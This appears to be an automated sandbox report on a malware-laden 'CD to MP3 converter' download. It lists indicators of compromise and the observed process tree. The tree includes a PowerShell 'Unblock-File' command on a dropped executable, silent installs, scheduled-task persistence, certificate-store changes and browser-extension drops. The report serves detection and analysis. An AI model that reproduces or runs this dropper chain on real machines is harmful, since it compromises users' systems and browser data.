Analysis
- max time kernel: 299s
- max time network: 296s
- platform: windows11-21h2_x64
- resource: win11-20240709-en
- resource tags: arch:x64, arch:x86, image:win11-20240709-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 14/07/2024, 19:00
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
- Sample: https://ify.ac/1Ic5
- Resource: win11-20240709-en
Behavioral task: behavioral2
- Sample: https://ify.ac/1Ic5
- Resource: win10-20240611-en
Behavioral task: behavioral3
- Sample: https://ify.ac/1Ic5
- Resource: win10v2004-20240709-en
Malware Config
Signatures
Blocklisted process makes network request 1 IoCs
- flow 109, pid 5876, rundll32.exe
pid Process
- 5140 powershell.exe
- 4768 powershell.exe
- 792 powershell.exe
- 4524 powershell.EXE
- 4544 powershell.exe
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (SDWk4rSnDwIEsW.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (rundll32.exe)
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-3171217504-1685128607-2237314850-1000\Control Panel\International\Geo\Nation (DlrnvPY.exe)
Executes dropped EXE 14 IoCs
- 5284 setup_ZbRJIaBi46.tmp
- 1928 cd2mp3converter32_64.exe
- 1180 zxkZvB0X70uuGxQ3YH.exe
- 1924 setup.exe
- 5852 setup.exe
- 2192 setup.exe
- 2228 setup.exe
- 3152 setup.exe
- 2568 SDWk4rSnDwIEsW.exe
- 472 Assistant_111.0.5168.25_Setup.exe_sfx.exe
- 2940 assistant_installer.exe
- 5532 assistant_installer.exe
- 1720 SDWk4rSnDwIEsW.exe
- 5200 DlrnvPY.exe
Loads dropped DLL 11 IoCs
- 5284 setup_ZbRJIaBi46.tmp
- 1924 setup.exe
- 5852 setup.exe
- 2192 setup.exe
- 2228 setup.exe
- 3152 setup.exe
- 2940 assistant_installer.exe
- 2940 assistant_installer.exe
- 5532 assistant_installer.exe
- 5532 assistant_installer.exe
- 5876 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
- File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json (DlrnvPY.exe)
- File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json (DlrnvPY.exe)
Drops desktop.ini file(s) 1 IoCs
- File opened for modification: C:\$RECYCLE.BIN\S-1-5-18\desktop.ini (DlrnvPY.exe)
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
- File opened (read-only): \??\D: (setup.exe)
- File opened (read-only): \??\F: (setup.exe)
- File opened (read-only): \??\D: (setup.exe)
- File opened (read-only): \??\F: (setup.exe)
Drops file in System32 directory 29 IoCs
Drops file in Program Files directory 14 IoCs
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja (DlrnvPY.exe)
- File created: C:\Program Files (x86)\UQtSSXvqU\qAmzzaV.xml (DlrnvPY.exe)
- File created: C:\Program Files (x86)\hMiQKFvmPLjeC\PLqbNoe.dll (DlrnvPY.exe)
- File created: C:\Program Files (x86)\ezMWJXFFLyUn\bjgALJF.dll (DlrnvPY.exe)
- File created: C:\Program Files (x86)\UQtSSXvqU\RGDzRw.dll (DlrnvPY.exe)
- File created: C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi (DlrnvPY.exe)
- File created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (DlrnvPY.exe)
- File created: C:\Program Files (x86)\AMqhlrBDqRJU2\aRsGgDBzvRlwz.dll (DlrnvPY.exe)
- File created: C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PFUpSQi.xml (DlrnvPY.exe)
- File created: C:\Program Files (x86)\hMiQKFvmPLjeC\HnXYHKd.xml (DlrnvPY.exe)
- File created: C:\Program Files (x86)\OJBbginKvssDnbEKbsR\mbXMUUu.dll (DlrnvPY.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi (DlrnvPY.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (DlrnvPY.exe)
- File created: C:\Program Files (x86)\AMqhlrBDqRJU2\UniKJqx.xml (DlrnvPY.exe)
Drops file in Windows directory 4 IoCs
- File created: C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job (schtasks.exe)
- File created: C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job (schtasks.exe)
- File created: C:\Windows\Tasks\OcPshDNvhDnVmSv.job (schtasks.exe)
- File created: C:\Windows\Tasks\MRTHivZIQsRdEanwm.job (schtasks.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 56 IoCs
Enumerates system info in registry 2 TTPs 10 IoCs
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (rundll32.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (rundll32.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (SDWk4rSnDwIEsW.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (SDWk4rSnDwIEsW.exe)
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 1 IoCs
- Key created: \REGISTRY\USER\S-1-5-21-3171217504-1685128607-2237314850-1000_Classes\Local Settings (msedge.exe)
description ioc Process
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 (setup.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 (setup.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 (setup.exe)
NTFS ADS 1 IoCs
- File opened for modification: C:\Users\Admin\Downloads\setup_ZbRJIaBi46.zip:Zone.Identifier (msedge.exe)
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
- 6060 schtasks.exe
- 4332 schtasks.exe
- 1948 schtasks.exe
- 3096 schtasks.exe
- 2472 schtasks.exe
- 1472 schtasks.exe
- 1624 schtasks.exe
- 2868 schtasks.exe
- 32 schtasks.exe
- 4308 schtasks.exe
- 4868 schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 43 IoCs
Suspicious use of SendNotifyMessage 19 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic51⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ffa7e7e3cb8,0x7ffa7e7e3cc8,0x7ffa7e7e3cd82⤵PID:5504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:22⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:82⤵PID:700
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:4776
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:1244
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1924
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:12⤵PID:1476
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵PID:2068
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵PID:3896
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:12⤵PID:5072
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4344
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:12⤵PID:2456
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:12⤵PID:3560
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵PID:336
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:12⤵PID:3228
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵PID:732
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:252
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:12⤵PID:3852
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:12⤵PID:2420
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1236 /prefetch:12⤵PID:236
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6828 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4192
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5532
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:912
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2192
C:\Users\Admin\Desktop\setup_ZbRJIaBi46.exe"C:\Users\Admin\Desktop\setup_ZbRJIaBi46.exe"1⤵PID:4964
C:\Users\Admin\AppData\Local\Temp\is-7CQA8.tmp\setup_ZbRJIaBi46.tmp"C:\Users\Admin\AppData\Local\Temp\is-7CQA8.tmp\setup_ZbRJIaBi46.tmp" /SL5="$502F2,6477394,56832,C:\Users\Admin\Desktop\setup_ZbRJIaBi46.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5284
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7143"3⤵PID:716
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe" 3c5b5dd0a5373645b73425ca977c0fb33⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1928
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 8404⤵
- Program crash
PID:5616
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 8484⤵
- Program crash
PID:2120
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9244⤵
- Program crash
PID:2824
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10444⤵
- Program crash
PID:4188
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10644⤵
- Program crash
PID:5524
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10924⤵
- Program crash
PID:5104
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11524⤵
- Program crash
PID:2068
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10444⤵
- Program crash
PID:4576
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11604⤵
- Program crash
PID:1176
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11924⤵
- Program crash
PID:5848
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9644⤵
- Program crash
PID:4896
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 13564⤵
- Program crash
PID:2708
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 15844⤵
- Program crash
PID:1132
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11364⤵
- Program crash
PID:1912
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9324⤵
- Program crash
PID:4920
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16684⤵
- Program crash
PID:5884
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20204⤵
- Program crash
PID:1916
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies4⤵PID:2128
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa7e7e3cb8,0x7ffa7e7e3cc8,0x7ffa7e7e3cd85⤵PID:1772
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17404⤵
- Program crash
PID:4932
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17324⤵
- Program crash
PID:3576
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17924⤵
- Program crash
PID:3028
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16644⤵
- Program crash
PID:4448
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 19364⤵
- Program crash
PID:2748
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16484⤵
- Program crash
PID:4860
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20844⤵
- Program crash
PID:6100
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20764⤵
- Program crash
PID:5860
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21324⤵
- Program crash
PID:452
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18084⤵
- Program crash
PID:5240
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21084⤵
- Program crash
PID:4796
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18244⤵
- Program crash
PID:3496
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18084⤵
- Program crash
PID:4604
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17404⤵
- Program crash
PID:5864
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20804⤵
- Program crash
PID:5684
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16764⤵
- Program crash
PID:5048
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21484⤵
- Program crash
PID:804
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17884⤵
- Program crash
PID:644
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20764⤵
- Program crash
PID:1312
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21724⤵
- Program crash
PID:4868
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21324⤵
- Program crash
PID:5828
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16724⤵
- Program crash
PID:2264
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21684⤵
- Program crash
PID:3140
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exe"4⤵PID:5436
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5140
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21204⤵
- Program crash
PID:1948
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18124⤵
- Program crash
PID:4056
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 19324⤵
- Program crash
PID:5156
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 15804⤵
- Program crash
PID:5856
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16644⤵
- Program crash
PID:2572
C:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exeC:\Users\Admin\AppData\Local\Temp\yBL5Tn5Z\zxkZvB0X70uuGxQ3YH.exe --silent --allusers=04⤵
- Executes dropped EXE
PID:1180
C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe --silent --allusers=0 --server-tracking-blob=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5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:1924
